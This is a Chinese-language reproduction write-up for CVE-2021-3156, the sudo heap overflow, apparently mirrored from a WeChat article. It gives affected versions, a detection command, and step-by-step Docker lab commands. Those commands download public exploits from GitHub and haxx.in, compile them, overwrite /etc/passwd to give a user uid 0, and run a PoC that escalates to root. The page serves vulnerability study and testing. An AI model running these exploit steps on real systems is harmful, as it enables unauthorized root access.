Skip to content

Latest commit

 

History

History
103 lines (77 loc) · 4.7 KB

CVE-2021-3156-sudo 缓冲区溢出复现.md

File metadata and controls

103 lines (77 loc) · 4.7 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

  1. 漏洞简介 =======

1 月 26 日,Sudo 发布安全通告,修复了一个类 Unix 操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当 sudo 通过 -s 或 -i 命令行选项在 shell 模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用 -s 或 -i 标志运行 sudoedit 时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在 sudoers 文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用 sudo 获得系统 root 权限。目前漏洞细节已公开,请受影响的用户尽快采取措施进行防护。

  1. 影响范围 =======

Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
不受影响版本:sudo =>1.9.5p2

  1. 检测方法 =======

非 root 执行sudoedit -s /
若返回以 “sudoedit:” 开头的错误,则当前系统可能存在安全风险。

不受影响的系统将显示以 “usage:” 开头的错误

  1. 利用复现 =======

4.0 测试环境搭建 docker-ubuntu.20.4+sudo-1.8.31

docker 拉环境
docker pull manishfoodtechs/xfcefulldesktop_ubuntu20.4
docker run -it manishfoodtechs/xfcefulldesktop_ubuntu20.4 /bin/bash
sudo 版本
sudo --version

系统版本
lsb_release -a

新建 test 测试用户
useradd test
passwd test

4.1 stong 的 exp

https://github.com/stong/CVE-2021-3156

su test
cd /tmp
宿主机下 poc,python 起 http 服务分享给测试环境
git clone https://github.com/stong/CVE-2021-3156.git
python3 -m http.server 80
docker 内下载宿主机分享的exploit.c
wget http://192.168.146.231/exploit.c
gcc ./exploit.c

cp /etc/passwd kanpasswd
把 kanpasswd 中的 test 用户 id 和组 id 换为 0
vim kanpasswd

./a.out /etc/passwd kanpasswd

在重新看 passwd,已经被修改了
cat /etc/passwd

需要 su 再重新切换至 test,此时 id 显示已提权,有权限看 shadow
su test

4.2 haxx.in 的 exp

https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

su test
cd /tmp
wget https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
tar xvf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156
make

./sudo-hax-me-a-sandwich

id
./sudo-hax-me-a-sandwich 0

  1. 参考 =====

https://mp.weixin.qq.com/s/x9Q4xsoEGsK1Kv_1AbHxaQ
https://xie1997.blog.csdn.net/article/details/113268374
https://mp.weixin.qq.com/s/IzmWZojdkorKc5qGu01Jcw